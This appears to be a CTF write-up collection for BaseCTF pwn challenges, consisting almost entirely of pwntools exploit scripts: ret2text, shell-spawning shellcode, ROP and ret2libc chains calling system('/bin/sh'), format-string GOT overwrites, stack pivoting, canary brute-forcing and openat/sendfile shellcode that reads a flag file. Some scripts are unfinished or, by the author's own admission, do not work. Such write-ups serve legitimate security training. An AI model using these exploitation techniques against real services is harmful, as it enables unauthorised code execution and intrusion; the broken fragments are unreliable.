[Week1] Ret2text
exp
from pwn import *
context(os='linux',arch = 'amd64',log_level = 'debug')
io = remote("challenge.basectf.fun",32537)
#io = process("./Ret2text")
ret_addr = 0x04011A3
payload = (0x20+0x8) * b'a' + p64(ret_addr) + p64(0x4011A4)
io.sendline(payload)
#io.recv()
io.interactive()
[Week1] shellcode_level0
from pwn import *
context.arch='amd64'
io = process("./shellcode")
io = remote("challenge.basectf.fun",38518)
shellcode = asm(shellcraft.sh())
io.recv()
io.sendline(shellcode)
io.interactive()
[Week1] 彻底失去她
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = process("./pwn")
io = remote("challenge.basectf.fun",28703)
elf = ELF("./pwn")
sys = elf.plt['system']
read = elf.plt['read']
pop_rdi = 0x0401196
pop_rsi = 0x0004011ad
pop_rdx = 0x0401265
ret = 0x0040101a
io.recvuntil("could you tell me your name?\n")
payload = (0xa+8)*b'a' + p64(ret) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x04040A0) + p64(pop_rdx) + p64(0x100) + p64(read) + p64(ret) + p64(pop_rdi) + p64(0x04040A0) + p64(sys)
io.sendline(payload)
io.sendline(b'/bin/sh')
io.interactive()
[Week1] 我把她丢了
from pwn import *
io = process("./diu")
io = remote("challenge.basectf.fun",43897)
elf = ELF("./diu")
sys = elf.plt['system']
pop = 0x0401196
bin_sh = 0x000402008
ret_addr = 0x00040101a
io.recvuntil("I lost her, what should I do? Help me find her.")
payload = (0x70 + 0x8 )*b'a' +p64(ret_addr)+ p64(pop) + p64(bin_sh) + p64(sys)
io.sendline(payload)
io.interactive()
[Week2] format_string_level0
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = process("./vuln")
io = remote("challenge.basectf.fun",23855)
io.sendline("AAAA-%8$s")
io.recv()
[Week2] format_string_level1
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = process("./vuln")
io = remote("challenge.basectf.fun",21378)
payload = fmtstr_payload(6,{0x0004040B0:0x1})
print(payload)
io.sendline(payload)
print(io.recv())
[Week2] gift
from pwn import *
io = process("./gift")
io = remote("challenge.basectf.fun",43283)
pop_rax_rdx_rbx = 0x000047f2ea
context(os='linux',arch='amd64',log_level='debug')
pop_rdi = 0x000401f2f
pop_rsi = 0x0409f9e
bss = 0x000004C72C0
ret = 0x0040101a
gets = 0x00040C270
io.recvuntil("quite the same")
payload = b'a'*(0x20+8) + p64(ret) + p64(pop_rdi) + p64(bss) + p64(gets) + p64(ret) + p64(pop_rax_rdx_rbx) + p64(0x3b) + p64(0) + p64(0) + p64(pop_rsi) + p64(0) + p64(pop_rdi) + p64(bss) + p64(0x000401ce4)
io.sendline(payload)
sleep(1)
io.sendline(b"/bin/sh\x00")
io.interactive()
[Week2] shellcode_level1
from pwn import *
from Crypto.Util.number import *
context.arch='amd64'
context(os='linux',arch='amd64',log_level='debug')
io = process("./pwn")
elf = ELF('./pwn')
io.sendline(b'\xb4\x10')
bss = 0x00004010
shellcode = asm()
io.sendline()
[Week2] 她与你皆失
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = process("./pwn")
io = remote("challenge.basectf.fun",20729)
elf = ELF("./pwn")
libc = ELF("./libc.so.6")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x401090
ret_addr = 0x0040101a
pop_rdi = 0x00401176
io.recvuntil("what should I do?\n")
payload1 = (0xa+8)*b'a' + p64(ret_addr) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendline(payload1)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(puts_addr)
base = puts_addr - libc.sym['puts']
sys = base + libc.sym['system']
bin_sh = base + next(libc.search('/bin/sh'))
io.recvuntil("what should I do?\n")
payload2 = (0xa+8)*b'a' + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(sys)
io.sendline(payload2)
io.interactive()
[Week3] format_string_level2
from pwn import *
from LibcSearcher import *
from Crypto.Util.number import *
#io = process("./fmt2")
io = remote("challenge.basectf.fun",44422)
elf = ELF("./fmt2")
libc = ELF("./libc.so.6")
context.arch='amd64'
context.log_level = 'debug'
all_logs = []
def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(io)[0]
gdb.attach(pid, params)
pause()
read_got = elf.got['read']
success(hex(read_got))
payload = b'bbbb%7$s' + p64(read_got)
io.sendline(payload)
io.recvuntil('bbbb')
read_addr = u64(io.recv(6).ljust(8,b'\x00'))
success(hex(read_addr))
printf_got = elf.got['printf']
base = read_addr - libc.sym['read']
system = base + libc.sym['system']
success(hex(system))
payload = fmtstr_payload(6,{printf_got:system})
print(payload)
io.sendline(payload)
#debug()
io.recv()
io.sendline(b'/bin/sh')
io.interactive()
[Week3] 你为什么不让我溢出
from pwn import *
context.arch='amd64'
context.log_level = 'debug'
all_logs = []
io = process("./pwn")
io = remote("challenge.basectf.fun",47479)
def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(io)[0]
gdb.attach(pid, params)
pause()
io.recvuntil('Hello Hacker!\n')
#debug()
payload = b'a'*104
io.sendline(payload)
#debug()
io.recvline()
can = u64(io.recv(7).ljust(8,b'\x00'))
success(hex(can<<8))
sys_addr = 0x4011B6
payload = b'a'*104 + p64(can<<8) + b'a'*8 +p64(0x0040101a)+p64(sys_addr)
io.sendline(payload)
#debug()
io.recv()
io.interactive()
stack_in_stack
栈迁移
from pwn import *
p = process('./attachment')
#p = remote('challenge.basectf.fun', 37529)
elf = ELF('./attachment')
lib = elf.libc
p.recvuntil(b'0x')
stack = int(p.recv(12), 16)
print(hex(stack))
payload = p64(0x4011C6) + p64(0x4010E0)
payload = payload.ljust(0x30, b'A') + p64(stack - 0x8) + p64(0x4012F2)
p.send(payload)
p.recvuntil(b'0x')
lib.address = int(p.recv(12), 16) - lib.symbols['puts']
print(hex(lib.address))
p.recvuntil(b'0x')
stack = int(p.recv(12), 16)
print(hex(stack))
pop_rdi = 0x000000000002a3e5 + lib.address
binsh = next(lib.search(b'/bin/sh'))
system = lib.symbols['system']
payload = p64(pop_rdi) + p64(binsh) + p64(system)
payload = payload.ljust(0x30, b'A') + p64(stack - 0x8) + p64(0x4012F2)
p.send(payload)
p.interactive()
PIE
0x7ffff7c29d10 <__libc_start_call_main>: push rax
0x7ffff7c29d11 <__libc_start_call_main+1>: pop rax
0x7ffff7c29d12 <__libc_start_call_main+2>: sub rsp,0x98
0x7ffff7c29d19 <__libc_start_call_main+9>: mov QWORD PTR [rsp+0x8],rdi
0x7ffff7c29d1e <__libc_start_call_main+14>: lea rdi,[rsp+0x20]
0x7ffff7c29d23 <__libc_start_call_main+19>: mov DWORD PTR [rsp+0x14],esi
0x7ffff7c29d27 <__libc_start_call_main+23>: mov QWORD PTR [rsp+0x18],rdx
0x7ffff7c29d2c <__libc_start_call_main+28>: mov rax,QWORD PTR fs:0x28
0x7ffff7c29d35 <__libc_start_call_main+37>: mov QWORD PTR [rsp+0x88],rax
0x7ffff7c29d3d <__libc_start_call_main+45>: xor eax,eax
0x7ffff7c29d3f <__libc_start_call_main+47>: call 0x7ffff7c421e0 <_setjmp>
0x7ffff7c29d44 <__libc_start_call_main+52>: endbr64
0x7ffff7c29d48 <__libc_start_call_main+56>: test eax,eax
0x7ffff7c29d4a <__libc_start_call_main+58>: jne 0x7ffff7c29d97 <__libc_start_call_main+135>
0x7ffff7c29d4c <__libc_start_call_main+60>: mov rax,QWORD PTR fs:0x300
0x7ffff7c29d55 <__libc_start_call_main+69>: mov QWORD PTR [rsp+0x68],rax
0x7ffff7c29d5a <__libc_start_call_main+74>: mov rax,QWORD PTR fs:0x2f8
0x7ffff7c29d63 <__libc_start_call_main+83>: mov QWORD PTR [rsp+0x70],rax
0x7ffff7c29d68 <__libc_start_call_main+88>: lea rax,[rsp+0x20]
0x7ffff7c29d6d <__libc_start_call_main+93>: mov QWORD PTR fs:0x300,rax
0x7ffff7c29d76 <__libc_start_call_main+102>: mov rax,QWORD PTR [rip+0x1f023b] # 0x7ffff7e19fb8
0x7ffff7c29d7d <__libc_start_call_main+109>: mov edi,DWORD PTR [rsp+0x14]
0x7ffff7c29d81 <__libc_start_call_main+113>: mov rsi,QWORD PTR [rsp+0x18]
0x7ffff7c29d86 <__libc_start_call_main+118>: mov rdx,QWORD PTR [rax]
0x7ffff7c29d89 <__libc_start_call_main+121>: mov rax,QWORD PTR [rsp+0x8]
0x7ffff7c29d8e <__libc_start_call_main+126>: call rax
0x7ffff7c29d90 <__libc_start_call_main+128>: mov edi,eax
0x7ffff7c29d92 <__libc_start_call_main+130>: call 0x7ffff7c455f0 <__GI_exit>
0x7ffff7c29d97 <__libc_start_call_main+135>: call 0x7ffff7c915f0 <__GI___nptl_deallocate_tsd>
0x7ffff7c29d9c <__libc_start_call_main+140>: lock dec DWORD PTR [rip+0x1f0505] # 0x7ffff7e1a2a8 <__nptl_nthreads>
0x7ffff7c29da3 <__libc_start_call_main+147>: sete al
0x7ffff7c29da6 <__libc_start_call_main+150>: test al,al
0x7ffff7c29da8 <__libc_start_call_main+152>: jne 0x7ffff7c29db8 <__libc_start_call_main+168>
0x7ffff7c29daa <__libc_start_call_main+154>: mov edx,0x3c
0x7ffff7c29daf <__libc_start_call_main+159>: nop
0x7ffff7c29db0 <__libc_start_call_main+160>: xor edi,edi
0x7ffff7c29db2 <__libc_start_call_main+162>: mov eax,edx
0x7ffff7c29db4 <__libc_start_call_main+164>: syscall
0x7ffff7c29db6 <__libc_start_call_main+166>: jmp 0x7ffff7c29db0 <__libc_start_call_main+160>
0x7ffff7c29db8 <__libc_start_call_main+168>: xor edi,edi
0x7ffff7c29dba <__libc_start_call_main+170>: jmp 0x7ffff7c29d92 <__libc_start_call_main+130>
0x7ffff7c29dbc: nop DWORD PTR [rax+0x0]
0x7ffff7c29dc0 <__libc_start_main_impl>: endbr64
0x7ffff7c29dc4 <__libc_start_main_impl+4>: push r15
0x7ffff7c29dc6 <__libc_start_main_impl+6>: mov r15,rcx
0x7ffff7c29dc9 <__libc_start_main_impl+9>: push r14
0x7ffff7c29dcb <__libc_start_main_impl+11>: push r13
0x7ffff7c29dcd <__libc_start_main_impl+13>: mov r13,rdi
0x7ffff7c29dd0 <__libc_start_main_impl+16>: push r12
0x7ffff7c29dd2 <__libc_start_main_impl+18>: mov r12,rdx
看一下汇编,我们可以篡改到0x7ffff7c29d89的地址,可以再次执行main函数,多次溢出,泄露并再次溢出
from pwn import *
p = process('./vuln')
#p = remote('challenge.basectf.fun', 44780)
elf = ELF('./vuln')
lib = elf.libc
pay = b'a' * 0x100 + b'b' * 8 + p8(0x89)
p.send(pay)
p.recvuntil(b'b' * 8)
lib.address = u64(p.recv(6).ljust(8, b'\x00')) - 0x29d89
print(hex(lib.address))
pop_rdi = 0x000000000002a3e5 + lib.address
binsh = next(lib.search(b'/bin/sh'))
system = lib.symbols['system']
pay = cyclic(0x108) + p64(pop_rdi) + p64(binsh) + p64(pop_rdi + 1) + p64(system)
p.send(pay)
p.interactive()
orz
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#io = process("./pwn1")
io = remote("challenge.basectf.fun",40281)
#io.recvuntil("shellcode:\n")
shellcode = asm('''
mov rax,0x67616c662f2e
push rax
xor rdi,rdi
sub rdi,100
mov rsi,rsp
xor edx,edx
xor r10,r10
push SYS_openat
pop rax
syscall
mov rdi,1
mov rsi,3
push 0
mov rdx,rsp
mov r10,0x100
push SYS_sendfile
pop rax
syscall
''')
io.sendline(shellcode)
io.interactive()
format_string_level3
查看canary机制
.text:0000000000401291 jz short locret_401298
.text:0000000000401293 call ___stack_chk_fail
检测到篡改以后,就调用这个函数,我们可以进行篡改,最终多次调用
from pwn import *
context.arch='amd64'
context.log_level = 'debug'
all_logs = []
def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(io)[0]
gdb.attach(pid, params)
pause()
#io = process("./vuln")
io = remote("challenge.basectf.fun",36565)
elf = ELF("./vuln")
main_addr = 0x04010D0
check_got = elf.got['__stack_chk_fail']
puts_got = elf.got['puts']
printf_got = elf.got['printf']
success(check_got)
io.recvuntil(b'-----\n')
payload = fmtstr_payload(6,{check_got:main_addr}).ljust(0x110,b'\x00')
io.send(payload)
io.recvuntil(b'-----\n')
payload = b'%7$sbbbb'+p64(puts_got)
payload = payload.ljust(0x110,b'a')
success(payload)
io.send(payload)
#debug()
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
success(puts_addr)
libc = ELF("./libc.so.6")
base = puts_addr - libc.sym['puts']
sys = base + libc.sym['system']
io.recvuntil(b'-----\n')
payload = fmtstr_payload(6,{printf_got:sys}).ljust(0x110,b'\x00')
io.send(payload)
io.recvuntil(b'-----\n')
io.sendline(b'/bin/sh')
io.interactive()
没有canary我要死了
我真死了,就是爆破canary和pie,但是我一直出不来,代码给出
from pwn import *
import ctypes
lib = ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
context.arch='amd64'
#context.log_level = 'debug'
#io = remote("challenge.basectf.fun",38162)
io = process("./pwn")
canary = '\x00'
for k in range(7):
for i in range(256):
v5 = lib.rand() % 50;
io.sendlineafter(b'BaseCTF',str(v5))
print ("the " + str(k) + ": " + chr(i))
io.recvuntil("welcome\n")
io.send('a'*104 + canary + chr(i))
a = io.recvline()
print( a)
if b"smashing" not in a:
canary += chr(i)
print ("canary: " + canary)
break
backdoor = 0x02A9
canary = u64(canary)
for i in range(16):
num = i << 12
v5 = lib.rand() % 50;
io.sendline(str(v5))
#io.recvuntil(b'welcome\n')
io.send(b'a'*104+p64(canary)+b'a'*8+p16(backdoor+num))
a = io.recvline()
if b'welcome' in a:
continue
else:
break
io.interactive()
ezstack
发现一个不得了的地方
.text:0000000000400658 add [rbp-3Dh], ebx
.text:000000000040065B nop
.text:000000000040065C retn
//它会将rbp-0x3d位置的值加上ebx的值,能否利用来修改任意地址数据
.text:00000000004006E6 loc_4006E6: ; CODE XREF: __libc_csu_init+34↑j
.text:00000000004006E6 add rsp, 8
.text:00000000004006EA pop rbx
.text:00000000004006EB pop rbp
.text:00000000004006EC pop r12
.text:00000000004006EE pop r13
.text:00000000004006F0 pop r14
.text:00000000004006F2 pop r15
.text:00000000004006F4 retn
完全可以利用,来修改这两个寄存器
看setvbuf到system的距离,将setvbuf的got表篡改为system
>>> from pwn import *
>>> libc = ELF("./libc.so.6")
[*] '/home/gery5sa/桌面/pwn/basectf/ezstack/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
>>> hex(libc.sym['setvbuf']-libc.sym['system'])
'0x31e80'
>>>
/bin/sh直接利用gets读入即可
from pwn import *
context.arch='amd64'
context.log_level = 'debug'
all_logs = []
def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(io)[0]
gdb.attach(pid, params)
pause()
io = process("./pwn")
#io = remote("gz.imxbt.cn",20607)
libc = ELF("./libc.so.6")
elf = ELF("./pwn")
rdi = 0x0004006f3
gadget1 = 0x0004006EA
magic = 0x0400658
offset = -0x30880
offset = offset & 0xffffffffffffffff
setvbuf_got = elf.got['setvbuf']
setvbuf_plt = elf.plt['setvbuf']
gets_plt = elf.plt['gets']
bss_addr = 0x0601080
ret = 0x04004d6
payload = b'a'*0x10 +p64(gadget1) + p64(offset) + p64(setvbuf_got+0x3d) + p64(0)*4 + p64(magic)
payload += p64(rdi) + p64(bss_addr) + p64(gets_plt)
payload += p64(rdi) + p64(bss_addr) + p64(setvbuf_plt)
io.sendline(payload)
#debug()
io.sendline(b'/bin/sh\x00')
io.interactive()